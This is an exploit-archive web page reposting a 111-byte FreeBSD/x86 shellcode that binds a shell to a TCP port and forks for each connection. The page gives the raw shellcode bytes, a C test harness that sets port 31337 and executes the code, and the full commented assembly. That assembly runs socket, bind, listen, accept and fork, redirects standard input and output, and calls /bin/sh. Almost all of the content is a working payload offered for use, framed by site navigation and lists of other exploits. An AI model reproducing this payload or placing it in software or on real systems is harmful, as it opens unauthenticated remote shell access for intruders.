首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
BSD x86 portbind + fork shellcode (111 bytes)
来源:tosh@tuxfamily.org 作者:Tosh 发布时间:2011-01-24  

/*
 -------------- FreeBSD/x86 - portbind shell + fork (111 bytes)--------------------
 *  AUTHOR : Tosh
 *   OS    : BSDx86 (Tested on FreeBSD 8.1)
 *   EMAIL : tosh@tuxfamily.org
 */

 

#include <stdio.h>
#include <string.h>
#include <arpa/inet.h>

char shellcode [] = "\x31\xc9\xf7\xe1\x51\x40\x50\x40\x50\x50\xb0\x61\xcd\x80\x96\x52\x66"
                    "\x68\x05\x39\x66\x68\x01\x02\x89\xe1\x6a\x10\x51\x56\x50\xb0\x68\xcd"
                    "\x80\x31\xc0\xb0\x05\x50\x56\x50\xb0\x6a\xcd\x80\x31\xc0\x50\x50\x56"
                    "\x50\xb0\x1e\xcd\x80\x97\x31\xc0\x50\xb0\x02\xcd\x80\x09\xc0\x74\xea"
                    "\x31\xc9\x31\xc0\x51\x57\x50\xb0\x5a\xcd\x80\xfe\xc1\x80\xf9\x03\x75"
                    "\xf0\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89"
                    "\xe1\x52\x51\x53\xb0\x3b\x50\xcd\x80";

void change_shellcode(unsigned short port)
{
   *((unsigned short*)(shellcode + 18)) = htons(port);
}
void print_shellcode(void)
{
   int i;
   for(i = 0; i < sizeof(shellcode) - 1; i++)
   {
      printf("\\x%.2x", (unsigned char)shellcode[i]);
   }
   printf("\n");
}
int main(void)
{
   unsigned short port = 31337;

   change_shellcode(port);
   print_shellcode();
   printf("Shellcode len = %d bytes\n", sizeof(shellcode)-1);
   void (*f)() = (void*) shellcode;

   f();

   return 0;
}

/*
   section .text
      global _start

   _start:
      xor ecx, ecx
      mul ecx
      push ecx         
      inc eax
      push eax       
      inc eax
      push eax       
      push eax       
      mov al, 97        ; socket(AF_INET, SOCK_STREAM, 0)
      int 0x80
    
      xchg esi, eax   
    
      push edx         
      push word 0x3905 
      push word 0x0201
      mov ecx, esp   
    
      push byte 16     
      push ecx       
      push esi       
      push eax       
      mov al, 104       ; bind(sock, sockaddr*, sizeof(sockaddr))
      int 0x80
    
      xor eax, eax
      mov al, 5
      push eax
      push esi
      push eax
      mov al, 106       ; listen(sock, 5)
      int 0x80

   .ACCEPT: 
      xor eax, eax
      push eax
      push eax
      push esi
      push eax
      mov al, 30        ; accept(sock, 0, 0)
      int 0x80
    
      xchg edi, eax
    
      xor eax, eax
      push eax
      mov al, 2         ; fork()
      int 0x80
    
      or eax, eax     
      jz .ACCEPT
    
    
      xor ecx, ecx      ; dup2 STDERR, STDIN, STDOUT
   .L:
      xor eax, eax
      push ecx
      push edi
      push eax
      mov al, 90     
      int 0x80
      inc cl
      cmp cl, 3
      jne .L
    
      push edx       
      push '//sh'
      push '/bin'     
    
      mov ebx, esp     
      push edx         
      push ebx         
      mov ecx, esp     
      push edx         
      push ecx         
      push ebx         
      mov al, 59        ; execve("/bin//sh", ["/bin/sh", NULL], NULL)
      push eax         
      int 0x80
*/


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·BSD x86 connect back Shellcode
·Inetserv 3.23 SMTP Denial of S
·Panda Global Protection 2010 l
·Golden FTP Server v4.70 PASS C
·Panda Global Protection 2010 l
·Look n stop 0day Local Dos
·ALZip 8.12.0.3 Buffer Overflow
·Inetserv 3.23 POP3 Denial of S
·Novell iPrint <= 5.52 ActiveX
·Automated Solutions Modbus/TCP
·Sun Microsystems SunScreen Fir
·Google Chrome v8.0.552.237 add
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved